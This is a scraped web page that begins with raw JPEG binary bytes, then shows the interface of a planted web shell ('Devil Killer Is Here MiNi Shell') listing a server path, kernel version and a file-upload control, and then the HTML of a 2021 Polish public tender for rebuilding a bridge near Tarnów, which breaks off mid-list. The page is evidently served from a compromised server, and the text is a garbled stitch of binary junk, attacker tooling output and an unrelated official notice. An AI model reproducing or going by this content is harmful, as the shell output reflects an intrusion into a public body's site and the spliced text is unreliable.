JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210507/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210507/0004804002-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00048040 z dnia 2021-05-07</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Rozbiórka istniejącego i budowa nowego mostu na potoku Olszynka w ciągu drogi powiatowej 1387K relacji Siepietnica - Lubaszowa w km 19+476 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIATOWY ZARZĄD DRÓG W TARNOWIE Z SIEDZIBĄ W ZGŁOBICACH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 120384654</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Zgłobicka 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zgłobice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">33-113</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL217 - Tarnowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">146741230</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">146741231</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pzd@powiat.tarnow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.malopolska.pl/pzdtszglobicach</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> drogi publiczne </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rozbiórka istniejącego i budowa nowego mostu na potoku Olszynka w ciągu drogi powiatowej 1387K relacji Siepietnica - Lubaszowa w km 19+476 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4b6ad305-aef3-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00048040</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001301/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Rozbiórka istniejącego i budowa mostu na potoku Olszynka w ciągu DP 1387K Siepietnica-Lubaszowa w km 19+476</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcami w szczególności składanie oświadczeń, <br/>wniosków, zawiadomień oraz przekazywanie informacji może się odbywać wyłącznie przy użyciu <br/>środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu <br/>usług drogą elektroniczną (Dz.U. z 2020 r. poz. 344), przy użyciu następujących narzędzi:<br/>1) miniPortalu - https://miniportal.uzp.gov.pl/ ,<br/>2) ePUAPu - https://epuap.gov.pl/wps/portal .<br/>3) poczty elektronicznej - adres e-mail: pzd@powiat.tarnow.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcami w szczególności składanie oświadczeń, <br/>wniosków, zawiadomień oraz przekazywanie informacji może się odbywać wyłącznie przy użyciu <br/>środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu <br/>usług drogą elektroniczną (Dz.U. z 2020 r. poz. 344), przy użyciu następujących narzędzi:<br/>1) miniPortalu - https://miniportal.uzp.gov.pl/ ,<br/>2) ePUAPu - https://epuap.gov.pl/wps/portal .<br/>3) poczty elektronicznej - adres e-mail: pzd@powiat.tarnow.pl<br/>We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający <br/>i Wykonawcy posługują się numerem ogłoszenia lub znakiem postępowania: ZP.271.5.2021.<br/> Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi <br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących <br/>formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz „Formularz <br/>do komunikacji”.<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, <br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu <br/>opisane zostały w Regulaminie korzystania z systemu miniPortal dostępnym pod adresem <br/>https://miniportal.uzp.gov.pl/WarunkiUslugi oraz Warunkach korzystania z elektronicznych <br/>platform usług administracji publicznej (ePUAP).Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego <br/>akceptuje warunki korzystania z miniPortalu, określone w Regulaminie korzystania z systemu <br/>miniPortal oraz zobowiązuje się, korzystając z miniPortalu, przestrzegać postanowień tego <br/>regulaminu.<br/> Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz <br/>do złożenia, zmiany, wycofania oferty lub wniosku” oraz „Formularz do komunikacji” wynosi <br/>150 MB.<br/> Za datę przekazania oferty, zawiadomień, dokumentów elektronicznych, oświadczeń lub <br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich <br/>przekazania na ePUAP. <br/> Zamawiający zaleca korzystanie z systemów miniPortal i ePUAP jedynie w zakresie w jakim jest to <br/>bezwzględnie wymagane zgodnie z niniejszą SWZ tzn. celem złożenia w postępowaniu oferty <br/>(i dokumentów przekazywanych wraz z nią) natomiast w pozostałym zakresie (tzn. przekazywania <br/>w postępowaniu pozostałych dokumentów, oświadczeń, zawiadomień, informacji) – Zamawiający <br/>rekomenduje korzystanie z poczty elektronicznej (adres email: pzd@powiat.tarnow.pl)<br/>Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej <br/>email pzd@powiat.tarnow.pl<br/>UWAGA ! Forma komunikacji za pomocą poczty elektronicznej nie dotyczy złożenia ofert</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.6.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: Rozbiórka istniejącego i budowa nowego mostu na potoku <br/>Olszynka w ciągu drogi powiatowej 1387K relacji Siepietnica - Lubaszowa w km 19+476.Zakres robót obejmuje m.in.:<br/>A Roboty mostowe – budowa nowego mostu:<br/>1) wprowadzenie tymczasowej zmiany w organizacji ruchu na czas budowy;<br/>2) wycinka drzew,<br/>3) zdjęcie humusu w zakresie kolizji z projektowanym zakresem robót,<br/>4) wykonanie platform roboczych – utwardzenie dojazdów do placu budowy na czas budowy,<br/>5) rozbiórka nawierzchni bitumicznej w zakresie kolizji z projektowanymi robotami mostowymi,<br/>6) zabicie ścianek szczelnych z grodzic stalowych,<br/>7) roboty ziemne – wykopy pod ławy fundamentowe w ściankach szczelnych z wywiezieniem <br/>urobku poza strefę koryta potoku i terasów,<br/>8) wykonanie betonu wyrównawczego na dnie wykopu,<br/>9) zbrojenie ław fundamentowych i ścian ramy nośnej,<br/>10) betonowanie elementów jw.,<br/>11) izolacje przeciwwilgociowe powierzchni betonowych elementów jw. stykających się z gruntem,<br/>12) zasypanie wykopów fundamentowych z zagęszczeniem gruntu (zasypanie wykopów gruntem <br/>nieprzepuszczalnym)<br/>13) wykonanie płyty pomostowej ustroju nośnego mostu14) wykonanie zasypek inżynierskich – zasypanie przestrzeni za podporami gruntem<br/>łatwozagęszczalnym do poziomu betonu wyrównawczego pod płyty przejściowe,<br/>15) wykonanie żelbetowych płyt przejściowych,<br/>16) wykonanie izolacji termozgrzewalnych płyty pomostowej oraz płyt przejściowych,<br/>17) wykonanie drenaży izolacji jw.,<br/>18) ułożenie krawężnika na długości mostu i skrzydeł,<br/>19) wykonanie zbrojenia kap chodnikowych (na długości płyty pomostu i skrzydeł)<br/>20) montaż desek gzymsowych,<br/>21) betonowanie kap chodnikowych,<br/>22) montaż barieroporęczy na długości kap chodnikowych,<br/>23) montaż dylatacji (uciąglenia nawierzchni) na styku ustroju niosącego z nawierzchnią na <br/>dojazdach,<br/>24) wykonanie nawierzchni bitumicznej na moście oraz żywicznych na kapach chodnikowych,<br/>25) zabezpieczenie powierzchni betonowych wyeksponowanych wszystkich podpór powłokami <br/>malarskimi do zabezpieczeń antykorozyjnych powierzchni betonowych,<br/>26) wykonanie nowego koryta potoku,<br/>27) umocnienie skarp potoku w obrębie mostu – wyprofilowanych ze spadkiem 1:1 na całej ich <br/>wysokości oraz długości odcinka od 25 m powyżej mostu do 30m poniżej mostu materacem <br/>siatkowo-kamiennym gr. 20cm<br/>28) umocnienie dna potoku w obrębie mostu w zakresie jw. na dł. 77.9m narzutem ze średniego <br/>kamienia o gr. >30cm. Przedmiotowe ubezpieczenie na końcach zostanie zastabilizowane <br/>gurtami betonowymi gr 40cm<br/>29) zasypanie gruntem gliniastym istniejącego koryta potoku w zakresie jego likwidacji,<br/>30) roboty wykończeniowe i porządkowe.<br/>B Roboty drogowe:<br/>1) wprowadzenie tymczasowej zmiany organizacji ruchu na czas prowadzenie robót,<br/>2) wykonanie nawierzchni objazdu z płyt drogowych przy nowym moście na czas budowy nowego <br/>mostu,<br/>3) zdjęcie warstwy humusy w zakresie kolizji z projektowaną inwestycją,<br/>4) rozebranie nawierzchni drogowej wraz z podbudowami na odcinku drogi powiatowej objętej <br/>wnioskiem, tj. od km 19+461.00 do km 19+523.00 DP1387,<br/>5) roboty ziemne – wykopy pod nową konstrukcję jezdni, chodnika i poboczy,<br/>6) roboty ziemne – budowa nasypów,<br/>7) budowa systemu odwodnienia wg części „Odwodnienie,”<br/>8) wykonanie korytowania pod konstrukcję jezdni i poboczy, chodników,<br/>9) wykonanie podbudów dla elementów jw.<br/>10) ułożenie elementów galanterii drogowej (krawężniki, obrzeża, itp.)<br/>11) wykonanie nawierzchni bitumicznych jezdni,<br/>12) wykonanie poboczy tłuczniowych,<br/>13) wykonanie odcinków chodników z kostki brukowej,<br/>14) obhumusowanie skarp wraz z obsianie nasionami traw,<br/>15) roboty wykończeniowe i porządkowe.<br/>16) ODWODNIENIE:<br/>• wykonanie wpustów deszczowych przykrawężnikowych z osadnikami na jezdniach drogi <br/>powiatowej,<br/>• budowa kanalizacji deszczowej z wylotami W1 i W2 do koryta potoku Olszynkawykonanie systemu podczyszczania wód opadowych z zawiesiny ogólnej w postaci <br/>osadników.<br/>3. Przedmiot zamówienia szczegółowo opisuje dokumentacja projektowa, kosztorysy ofertowe <br/>(mostowy i drogowy) oraz Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych <br/>(STWiORB), które stanowią załączniki do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45221100-3 - Roboty budowlane w zakresie budowy mostów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45221111-3 - Roboty budowlane w zakresie mostów drogowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie <br/>dokumentów i oświadczeń złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki dotyczące zdolności technicznej lub zawodowej<br/>a) Na potwierdzenie spełniania warunku Wykonawcy ubiegający się o udzielenie zamówienia <br/>wykażą, że wykonali nie wcześniej niż w okresie ostatnich 5* lat a jeżeli okres prowadzenia <br/>działalności jest krótszy – w tym okresie, co najmniej 1 zamówienie tj. roboty budowlane polegające na budowie lub przebudowie lub odbudowie obiektu mostowego o konstrukcji <br/>żelbetowej lub sprężonej i o wartości brutto nie mniejszej niż 2 000 000,00 zł<br/>* okres wyrażony powyżej liczy się wstecz od dnia w którym upływa termin składania ofert.<br/> b) dysponują lub będą dysponować 1 osobą na stanowisko:<br/>-kierownika budowy z uprawnieniami do kierowania robotami budowlanymi bez ograniczeń <br/>w specjalności mostowej lub odpowiadające im ważne uprawnienia budowlane wydane na <br/>podstawie obowiązujących przepisów prawa. Zamawiający wymaga aby osoba, która będzie <br/>pełniła funkcję kierownika robót dysponowała 5 letnim doświadczeniem zawodowym <br/>w kierowaniu robotami w specjalności mostowej (licząc od dnia uzyskania uprawnień) i pełniła <br/>funkcję kierownika budowy lub kierownika robót w realizacji co najmniej jednego zamówienia <br/>polegającego na budowie lub przebudowie lub odbudowie obiektu mostowego o konstrukcji <br/>żelbetowej lub sprężonej i o wartości brutto nie mniejszej niż 2 000 000,00 zł<br/>Osoba pełniąca funkcję kierownika budowy musi posiadać aktualne zaświadczenie o <br/>przynależności do właściwej miejscowo izby samorządu zawodowego. Przez uprawnienia <br/>budowlane do kierowania robotami budowlanymi rozumie się uprawnienia do sprawowania <br/>samodzielnych funkcji technicznych w budownictwie, wydane na podstawie Prawa <br/>Budowlanego oraz Rozporządzenia Ministra Transportu i Budownictwa z dnia 11 września 2014 <br/>roku w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014r poz. 1278) <br/>albo odpowiadające im inne ważne uprawnienia budowlane wydane na mocy wcześniej <br/>obowiązujących przepisów. Za samodzielną funkcję techniczną w budownictwie uważa się <br/>działalność związaną z koniecznością fachowej oceny zjawisk technicznych lub samodzielnego <br/>rozwiązania zagadnień architektonicznych i technicznych oraz techniczno-organizacyjnych. <br/>Samodzielne funkcje techniczne w budownictwie mogą wykonywać wyłącznie osoby <br/>posiadające odpowiednie wykształcenie techniczne i praktykę zawodową, dostosowane do <br/>rodzaju skomplikowania działalności i innych wymagań związanych z wykonywaną funkcją, <br/>stwierdzone decyzją, zwaną uprawnieniami budowlanymi (zgodnie z art. 12 Ustawy z dnia <br/>7 lipca 1994r Prawo Budowlane (Dz.U. 2016r poz. 290 z późn. zm.). Zamawiający określając <br/>wymogi dla osoby w zakresie posiadanych uprawnień budowlanych dopuszcza odpowiadające <br/>im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej <br/>obowiązujących przepisów oraz odpowiadające uprawnienia wydane obywatelom państw <br/>członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej oraz Europejskiego Porozumienia o <br/>Wolnym Handlu (EFTA) – stronach umowy o Europejskim Obszarze Gospodarczym, <br/>z zastrzeżeniem przepisu art. 12a ustawy Prawo budowlane (Dz. U. z 2016, poz. 290 z późn. zm.)<br/>oraz przepisów ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach <br/>członkowskich Unii Europejskiej (Dz. U.z 2016 r., poz. 65). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do <br/>tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie <br/>konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył <br/>odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo <br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub <br/>informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o <br/>dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej <br/>samej grupy kapitałowej – załącznik nr 5 do SWZ; <br/>2) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o <br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej <br/>niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub <br/>ewidencji; <br/>Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, <br/>zamiast dokumentu, o których mowa w pkt. 2), składa dokument lub dokumenty wystawione <br/>w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, <br/>że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokument, o którym mowa powyżej, <br/>powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się <br/>dokumentów, o których mowa w pkt. 2), zastępuje się je w całości lub części dokumentem <br/>zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób <br/>uprawnionych do jego reprezentacji, złożone przed notariuszem lub przed organem sądowym, <br/>administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze <br/>względu na siedzibę lub miejsce zamieszkania Wykonawcy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">wykaz robót budowlanych, zgodny z zamieszczonym wzorem - załącznik nr 6 do SWZ, <br/>wykonanych nie wcześniej niż w okresie ostatnich 5 lat* a jeżeli okres prowadzenia działalności <br/>jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania <br/>oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów <br/>określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o <br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz <br/>którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od <br/>niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty; <br/>*okres podany powyżej liczy się wstecz od dnia w którym upływa termin składania ofert<br/>wykaz osób, 